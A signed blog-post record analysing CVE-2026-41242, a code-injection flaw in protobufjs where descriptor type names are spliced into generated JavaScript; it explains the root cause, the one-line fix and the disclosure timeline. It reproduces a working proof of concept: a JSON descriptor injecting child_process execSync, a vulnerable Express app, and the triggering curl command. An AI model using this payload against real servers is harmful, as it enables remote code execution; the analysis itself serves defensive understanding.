-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

NEFARIOUSPLAN-CANONICAL-V1
{"body_md":"## The codegen library treats the function-name parameter as source code\n\n`@protobufjs/codegen` is a hundred-line npm package that protobufjs uses to build per-type encoder, decoder, verifier, and converter functions at runtime. Its public API is one function: `codegen(params, name)`. The author appends to the body with format-string calls, then finalizes with a scope object. The build step is a string concatenation:\n\n```js\nfunction toString(functionNameOverride) {\n    return \"function \" + (functionNameOverride || functionName || \"\") +\n           \"(\" + (functionParams && functionParams.join(\",\") || \"\") +\n           \"){\\n  \" + body.join(\"\\n  \") + \"\\n}\";\n}\n```\n\nBody lines are appended with `%i`, `%j`, `%s` format specifiers. The JSON specifier is the load-bearing one: `gen(\"foo=%j\", value)` JSON-stringifies `value` so it embeds as a valid JS literal even when it carries quotes, newlines, or backslashes. Every author writing a body line understands that the formatter is responsible for escaping data into source.\n\nThe function-name parameter has no formatter. It is interpolated bare. The library's contract is implicit: callers must pass a string that is also a valid JavaScript identifier. Nothing in the library checks the contract. Nothing in the library documents it as a contract. The README's first sentence reads \"A minimalistic code generation utility.\" It is.\n\n## Six call sites, one trust boundary, and it lived nowhere\n\nprotobufjs builds five families of generated functions per message type. 
Each generator picks a function name in the same shape:\n\n```js\n// src/decoder.js:19\nvar gen = util.codegen([\"r\", \"l\", \"e\"], mtype.name + \"$decode\")\n// src/encoder.js:30\nvar gen = util.codegen([\"m\", \"w\"], mtype.name + \"$encode\")\n// src/verifier.js:125\nvar gen = util.codegen([\"m\"], mtype.name + \"$verify\")\n// src/converter.js:108\nvar gen = util.codegen([\"d\"], mtype.name + \"$fromObject\")\n// src/converter.js:211\nvar gen = util.codegen([\"m\", \"o\"], mtype.name + \"$toObject\")\n// src/type.js:200\nvar gen = util.codegen([\"p\"], mtype.name);\n```\n\nSix places. Five of them append a verb to `mtype.name`; the sixth, in `src/type.js`, passes it bare. In every case the result becomes the function name. The name comes from `Type.prototype.name`, set in the constructor:\n\n```js\nfunction Type(name, options) {\n    Namespace.call(this, name, options);\n    ...\n}\n```\n\n`name` is whatever the caller passed. Pre-patch, the constructor performs no validation. The Namespace base class stores it on `this.name`. Six codegen sites read it back and concatenate.\n\nThe trust boundary lived nowhere. The decoder author trusted Type. Type trusted its caller. The codegen library trusted Type. None of the three layers between the wire and the generated `Function()` constructor held the responsibility of checking that the name was a JavaScript identifier. The patch makes Type the holder. Pre-patch, nobody held it.\n\n## The exploit primitive\n\nA protobuf descriptor in JSON form is a dictionary of message types, each with named fields. A field's `type` value is the name of either a primitive (`int32`, `string`) or another message type defined elsewhere in the same descriptor. `Root.fromJSON` walks the dictionary and constructs a `Type` per entry, taking the dictionary key as the name. 
The PoC's `payload.json` makes the dictionary key the injection vector:\n\n```json\n{\n  \"nested\": {\n    \"User\": {\n      \"fields\": {\n        \"id\":   { \"type\": \"int32\", \"id\": 1 },\n        \"data\": {\n          \"type\": \"Data(){console.log(process.mainModule.require('child_process').execSync('id').toString())};\\nfunction X\",\n          \"id\": 2\n        }\n      }\n    },\n    \"Data(){console.log(process.mainModule.require('child_process').execSync('id').toString())};\\nfunction X\": {\n      \"fields\": { \"content\": { \"type\": \"string\", \"id\": 1 } }\n    }\n  }\n}\n```\n\nTwo message types. The second is keyed by `Data(){...payload...};\\nfunction X`. `User.data` references it by that exact key. The vulnerable web app the PoC ships with is twenty lines:\n\n```js\nconst express = require('express');\nconst protobuf = require('protobufjs');\n\nconst app = express();\napp.use(express.json());\n\napp.post('/create_user', (request, response) => {\n    const descriptor = request.body;\n    const root = protobuf.Root.fromJSON(descriptor);\n    const UserType = root.lookupType('User');\n    const userBytes = Buffer.from([0x08, 0x01, 0x12, 0x07, 0x0a, 0x05, 0x68, 0x65, 0x6c, 0x6c, 0x6f]);\n    try { UserType.decode(userBytes); } catch (e) { }\n});\n\napp.listen(3000);\n```\n\nThe route accepts a JSON body, builds a protobuf root from it, looks up `User`, and decodes a fixed eleven-byte payload. The `userBytes` decode to `User { id: 1, data: Data { content: \"hello\" } }`. The decode of the `data` field is what reaches the second Type and triggers code generation for it.\n\n`Type.prototype.decode` is a stub that calls `this.setup()` on first invocation and replaces itself with the generated function. `setup()` calls all five codegen generators in sequence. The first one is `encoder()`, which calls:\n\n```js\nvar gen = util.codegen([\"m\", \"w\"], mtype.name + \"$encode\")\n```\n\nFor the second Type, `mtype.name` is the malicious string. 
`mtype.name + \"$encode\"` becomes `Data(){...};\\nfunction X$encode`. The codegen library appends body lines, then finalizes. `toString()` returns:\n\n```\nfunction Data(){console.log(process.mainModule.require('child_process').execSync('id').toString())};\nfunction X$encode(m,w){\n  ...encoder body...\n}\n```\n\nThe library prepends `return ` to that source and passes it to the `Function` constructor:\n\n```js\nsource = \"return \" + source;\n...\nreturn Function.apply(null, scopeParams).apply(null, scopeValues);\n```\n\n`return function Data(){...}` is a return statement followed by a function expression. The expression evaluates to a function object; the return statement returns it; the rest of the source (the `X$encode` declaration) is unreachable code that never runs. The library then calls `.apply(null, scopeValues)` on the returned function. The returned function is `Data`. Calling it executes `console.log(process.mainModule.require('child_process').execSync('id').toString())`.\n\nThe single curl that fires this:\n\n```bash\ncurl -X POST -H 'Content-Type: application/json' \\\n  http://target:3000/create_user --data @payload.json\n```\n\nThe PoC's harness has no exposed return path for command output, so the demonstration writes to `console.log`. A real attack would write to a file, hit an outbound URL, or replace the function body with `eval(process.env.REMOTE_PAYLOAD)`. The descriptor is JSON; the parser reads it without size limit; the function-name slot accepts every Unicode character. The 4chech harness ships the minimum demonstration. The class admits arbitrarily larger payloads.\n\n## What the description names\n\nThe cve.org record reads: \"attackers can inject arbitrary code in the 'type' fields of protobuf definitions, which will then execute during object decoding using that definition.\" The description is correct on every word. 
It is also not enough to find the bug.\n\nA defender reading the description without the codepath looks for a JSON parser that evals input, finds none, and concludes the bug must be in protobuf-message bytes rather than protobuf-descriptor objects. The wire payload in the PoC is `[0x08, 0x01, 0x12, 0x07, 0x0a, 0x05, 0x68, 0x65, 0x6c, 0x6c, 0x6f]`, an unremarkable eleven-byte serialization. The injection lives in the descriptor. The \"during object decoding\" timing means the codegen runs lazily on first `decode()` rather than eagerly during `Root.fromJSON`, so a server that parses descriptors but never decodes against them is not exploitable, and a server that does both is fully exploitable. The description leaves both halves of that distinction to the reader.\n\n## This is content-is-command\n\nA JSON descriptor is content. The codegen library is an interpreter that reads strings out of the descriptor and produces JavaScript. The bridge is the function-name parameter in `@protobufjs/codegen`, where strings cross from the data plane to the source-text plane without escaping. The pattern's [Content Is Command](/patterns/content-is-command) reading covers this exactly: an external input channel feeds an interpreter that treats it as instructions because the interpreter never separated instruction from data at the boundary the channel was crossing.\n\nThe closest sibling exhibit is graphql-ruby. CVE-2025-27407 took a JSON introspection document, read field names from it, and spliced them into a Ruby `class_eval <<-RUBY` HEREDOC that defined methods. The interpreter was the Ruby compiler; the bridge was an unescaped name interpolation; the content source was an external schema document. The graphql-ruby fix added `/^[_a-zA-Z][_a-zA-Z0-9]*$/` to the name handler and replaced the `class_eval` with a captured-closure `define_method`. 
The protobufjs case is the same shape with JavaScript and `Function()` in place of Ruby and `class_eval`, and a JSON descriptor in place of a JSON introspection document. The protobufjs fix is the regex equivalent. Both fixes name the contract the loader was supposed to enforce and never had.\n\n## The fix is at Type. The library is unchanged.\n\nThe patch is one line in `src/type.js`:\n\n```diff\n function Type(name, options) {\n+    name = name.replace(/\\W/g, \"\");\n     Namespace.call(this, name, options);\n```\n\n`\\W` matches every character that is not in `[A-Za-z0-9_]`. Parentheses, semicolons, newlines, dots, brackets, slashes, spaces, every Unicode codepoint outside the identifier class. The patch's commit message: \"There is no reason why the type name would contain anything other than alphanumeric characters. Filter the remaining characters with a regex.\" The contract is named for the first time in the line that enforces it.\n\n`@protobufjs/codegen` is a separate package on npm with its own version (`2.0.4` as shipped in vulnerable installs). The codegen package's `Codegen.toString` still concatenates the functionName parameter into source text without validation. Any other consumer of `@protobufjs/codegen` that passes caller-influenced strings as the function name has the same primitive available. The package's README, its TypeScript types, and its index.js source contain no statement that the function name must be a valid JavaScript identifier.\n\nprotobufjs's fix solves protobufjs. It is the right shape of fix; the Type constructor is the natural choke point for incoming descriptor data, and one regex there protects all six call sites with no per-site changes. It does not solve `@protobufjs/codegen`, which continues to publish under the contract-by-implication it always had. The function-name slot is the only parameter in `@protobufjs/codegen` with no escape formatter. 
It is also the only one this CVE ever needed.\n\n## The disclosure window was the diff\n\nCristian Staicu of Endor Labs filed protobufjs issue #2124 on February 25, 2026. The issue body contains no technical detail; it asks the maintainers to set up a security policy and a private advisory channel so the report can move out of the public tracker. Pull request #2127 with the one-line fix landed in master on March 11, 2026, with the commit message quoted above. The release tagged `protobufjs-cli-v2.0.1` carries the fix at `535df44`. The GitHub Security Advisory was not published until April 16, 2026.\n\nThirty-six days separated the public commit from the public advisory. The diff itself was the disclosure: a maintainer-written patch that strips non-alphanumeric characters from a type name describes a class of input that previously was not stripped, and the consumers of that name (the six codegen sites listed above) are the obvious places to look. The PoC at `4chech/CVE-2026-41242` ships with Russian comments (`// JSON-дескриптор из тела запроса`), pins `protobufjs ^7.5.4`, and reproduces against the upstream commit immediately preceding the fix. The author did not need access to the advisory to build the harness. The commit was enough.\n\nPoC: [4chech/CVE-2026-41242](https://github.com/4chech/CVE-2026-41242)","closing_line":"The patch closes this CVE. The codegen library that interpolated the name into source code is unchanged.","hook_md":"The patch is one line in the Type constructor. `name = name.replace(/\\W/g, \"\");`. It strips every character that is not a letter, a digit, or an underscore from anything passed as a protobuf type name. The line was added on March 10, 2026, and shipped in protobufjs 7.5.5 and 8.0.1 on April 16. For every prior release, the Type constructor accepted any string as a name. 
Five files and six call sites took that string and handed it to a code-generation library, which spliced it, raw, between the keyword `function` and the opening parenthesis of a function declaration.","post_id":53,"slug":"protobufjs-cve-2026-41242-type-name-was-javascript","title":"CVE-2026-41242: protobufjs's Type Name Was JavaScript","type":"initial","unreadable_sentence":"The function-name slot is the only parameter in @protobufjs/codegen with no escape formatter. It is also the only one this CVE ever needed."}
-----BEGIN PGP SIGNATURE-----

iHUEARYIAB0WIQRf0htP5+SjynlxywneZjl4jgkQJgUCahMxGQAKCRDeZjl4jgkQ
JjG3AP9ub1kDEnd+YMuHrk6zlvBASmo15nXwEZjUzmmAMasdVwEAsZYJ3vNloTqS
R46lSlc8SkrGYjo7T/Fe9KX5Zr9FgQk=
=gIuC
-----END PGP SIGNATURE-----